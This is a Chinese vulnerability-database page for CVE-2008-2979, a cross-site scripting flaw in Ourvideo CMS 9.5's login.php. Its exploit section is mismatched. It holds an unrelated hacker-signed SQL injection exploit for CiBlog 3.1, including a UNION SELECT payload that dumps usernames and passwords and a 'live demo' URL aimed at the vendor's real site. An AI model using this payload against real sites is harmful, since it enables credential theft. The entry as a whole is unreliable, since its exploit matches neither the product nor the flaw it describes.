Ourvideo CMS phpi/login.php 文件跨站漏洞

QQ空间 新浪微博 微信 QQ facebook twitter
漏洞ID 1186409 漏洞类型 跨站脚本
发布时间 2008-07-02 更新时间 2008-07-02
CVE编号 CVE-2008-2979 CNNVD-ID CNNVD-200807-036
漏洞平台 N/A CVSS评分 4.3
|漏洞来源
https://www.securityfocus.com/bid/81008
https://cxsecurity.com/issue/WLB-2008070072
http://www.cnnvd.org.cn/web/xxk/ldxqById.tag?CNNVD=CNNVD-200807-036
|漏洞详情
OurvideoCMS是一款基于MySql和php的媒体内容管理系统。OurvideoCMS9.5的phpi/login.php中存在多个跨站脚本攻击漏洞,远程攻击者通过(1)top_page和(2)end_page参数来注入任意web脚本或HTML。
|漏洞EXP
## Remote SQL Injection Vulnerability
##
## CiBlog 3.1 ( links-extern.php id )
##
#########################################################################
#########################################################################
##
## AuTh0r : Mr.SQL
##
## H0ME   : WwW.PaL-HaCkEr.CoM  &  WwW.ATsDp.CoM
##
## Email  : SQL@Hotmail.it
##
## !! SYRIAN HaCkErS  !!
########################
########################
##
## Script  : CiBlog  3.1
##
## site    : www.cistyle.de
##
########################
########################
##
##     -(:: SQL ::)-
##
##    www.site.com/
##         links-extern.php?id=-2+union+select+1,concat_ws(0x3a,user,password),1,1,1,1+from+user/*
##
##  -(:: L!VE DEMO ::)-
##
##    http://www.cistyle.de/demo/links-extern.php?id=-2+union+select+1,concat_ws(0x3a,user,password),1,1,1,1+from+user/*
|受影响的产品
Ourvideo CMS Ourvideo CMS 9.5
|参考资料

来源:XF
名称:ourvideocms-login-xss(43313)
链接:http://xforce.iss.net/xforce/xfdb/43313
来源:BID
名称:29909
链接:http://www.securityfocus.com/bid/29909
来源:MILW0RM
名称:5920
链接:http://www.milw0rm.com/exploits/5920
来源:SREASON
名称:3968
链接:http://securityreason.com/securityalert/3968